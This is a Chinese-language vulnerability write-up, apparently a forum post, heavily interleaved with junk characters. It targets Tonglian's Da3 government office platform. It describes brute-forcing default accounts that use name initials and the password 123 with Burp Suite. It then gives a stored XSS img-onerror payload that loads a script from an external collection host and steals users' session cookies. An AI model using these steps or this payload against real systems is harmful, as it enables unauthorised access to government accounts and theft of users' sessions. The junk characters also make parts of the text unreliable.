; P. D3 u/ }0 e/ j5 | ; v2 J. t0 f4 \% A) o3 i
同联Da3协同办公平台后台通用储存型xss漏洞
+ J7 z% q& M1 p; j
8 \; Z- E: c: U) R
( w* O3 W4 O) }+ W6 [ 平台简介:4 k: ~" N; _9 N6 U+ f
5 O* f0 M- R. n! x) @3 p
8 u" \6 e9 H. t: q) h: z+ b
7 M1 M" ?3 D2 p5 \) X
, }0 n1 A% h) W
* o5 i# }5 e9 l! U8 @6 B. N
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
4 G$ p; H8 E' ] N" I( F同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 E1 R+ D# @0 X9 B
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
0 Y; E# k* {9 N1 p
$ B- T$ h, R: v+ V! m: N6 O k( q. ^* h6 s9 _" x# C: S
+ o) G% f( V6 m4 ]$ S3 Q/ S7 F
L; @: g* X6 I' h
( Y" |" G' \* A4 _& M 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 s7 H$ H2 p/ b% I, M
# K1 B3 f( |+ ]% j9 Q: X" e2 ]. [6 K
/ T2 S1 G# l1 X# N+ L0 b
% w ^& w: @- m* k8 X0 p
' Y# H1 A2 F* }0 I9 s
4 I9 b" Y/ N5 f2 h
http://1.1.1.1:7197/cap-aco/#(案例2-)* \. w: Z& X6 ?" O( \ B( K
1 g7 ^; H( G( j9 ?4 \ . o1 F1 b5 D0 V2 H
http://www.XXOO.com (案例1-官网网站)
3 K9 w3 ~3 e' u5 k
3 I6 |* T, X6 S: V
' o2 D, o% g" f# R 漏洞详情:
: J' q. L. l- m: F) K
" z1 x9 S1 l4 w! t' y5 n9 i
. Q; r- I) S2 c5 b! W. d$ x% W. t 案例一、
1 f6 H; ~2 r C4 I% f( z
1 e: q" v9 v( r0 s7 H 4 X, _6 M4 N% Y* B9 u0 K
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
' y$ E( p6 m8 c5 h; L3 i
8 ?# Q" l4 k* q4 d# _. c, R0 J, A
, o( z% q9 p- I* v- I% S7 g; ^& h3 S 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
8 q3 e" |7 r9 D4 Z5 k
" B, \2 o. |" b: G1 n+ W
/ B: D/ S2 o1 S) d
5 u. `7 B3 S' @4 S: n( @
( W$ V( ]# o) t' \7 Z. J
- B4 @! t( _2 d) q3 }7 m0 ] 
/ y) X! U0 O7 i6 b( W
& z' ?. X' W! R4 `% s' V 6 ^0 b) r6 ~% [" c
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
- |: P! {, A8 H& h) ~ l
1 _5 e5 N' B7 C: S4 y0 k
$ n& s) ]8 a7 y* q
& e5 k& M5 F3 Z+ }
! r) @7 }+ M p Z/ J: n1 {9 K
3 ^( b8 F/ _! r, | 
: J, s# n- D$ W( y
! P* ]; J6 B+ S, O1 R% \4 i
7 r7 C( |& b4 ? 然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下 " f* q. w* Y) L4 F- ]
' d' M5 j b' K4 e( L9 s/ \
5 a" ]' H' |9 ~; H( P' d% W 9 J6 o% c) j ^8 _% Q' \
8 ~& E: a# N4 h! f/ W% n
3 l* i9 b' T& a- m T! X8 P% F
<img src=x3 e# }1 S6 m. M8 y- v6 d
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: $ f9 k* x& Q; m( k5 z
. I1 z1 c$ J; |- r+ y: Z' t
4 v1 b9 w; n1 g+ I 
2 [0 Q; W; v3 m- }
: e2 y9 G& ~4 S1 m1 [" J& i" O0 a
* k5 t/ F3 s6 a. l/ P* p
然后发送,接收cookie如图: 9 R1 Y6 P5 K: r2 q4 ?( b% \) v
3 D' ~( U6 f& k$ i- d9 P- ~
1 q. U' i( R8 W$ l0 F3 d5 J
# C$ r: j, `* Z' x
1 ]3 W( U7 r/ A1 V$ u( M# ?
8 W( `7 Z* f5 {0 u1 {$ t' j, @% B# d
% k# u+ e6 h5 D( r7 X
3 }! v5 Y& z7 g3 w$ w) J
' x m: q& j% u9 K
1 i, `5 F' Q% K, |( J* E& e* o
- N s0 g* Y, b; ~# J9 C
) [# O0 H' j5 F3 v
9 x7 g: m8 T P8 ^2 l+ K T
. t/ d! S7 [5 O7 n2 r0 W
5 o/ X' E6 e, L; l 
# q$ q* S- U, T/ T* _
9 C' {( S: ~/ x1 G+ h* V
3 [8 e0 v& V9 y5 ?
- @7 R- b; |) k! A" w& _4 S
% T) W1 K) y7 }8 W8 v. W
d9 `. d- _/ ? L; R * \2 k) i7 {( y% H
( Q0 Q1 S9 F; `) w' V
$ z2 G, f, @( n4 q8 u# m& Q
案例2、 $ [0 P6 w9 m3 I4 L. d! G
[# B1 q4 ?) u& M; [
+ B6 C7 D/ o" n. S5 r6 a; j8 n
前面步骤都一样,下面看效果图: - D% I* X! a. U
5 p8 n" o( P' ]0 e' O8 M 6 s7 m3 t% X W# ~3 `7 e+ I
3 w2 L9 g; h- d( b5 U6 L
. g7 ^0 ^" L% V& S+ g
. G! A1 o+ {$ S* l ]$ [$ ? 
" j" B; @0 ]) m- \; \0 n; D
, o8 f8 D- X7 J / N# N8 s- Z& E' W
% |& i' E! f, B- C
# ~* @/ }( v1 F
3 ~7 _2 G0 ]8 [1 z. z6 ^& f9 N
6 e$ p$ `. Y. V( N" z" S
0 S+ V: t- B$ h$ k 2 C4 f" v+ Y5 h/ g U
, t- f) g$ k! ]5 \9 T- c+ l
( p D' Y4 J f7 v8 S" Q, g
3 U0 \+ [; r. [ ]0 L
( K$ P3 a3 i! J! {
+ b* r9 M+ v- A/ V
b7 n/ E4 b; F$ h8 [! p
2 C. y4 Z F7 |. `
4 d) A X( d$ L1 b) f % F5 E, j$ c, m% v1 ^ y( Y7 q
8 ]3 U$ X# t7 X- h/ v4 X T( V
g, d5 t6 u) X9 @: x; ]9 j- e
$ H7 }' ? h5 i$ t/ F * `" c' T3 g8 X; _
6 z7 m+ D4 A: O* f" D+ n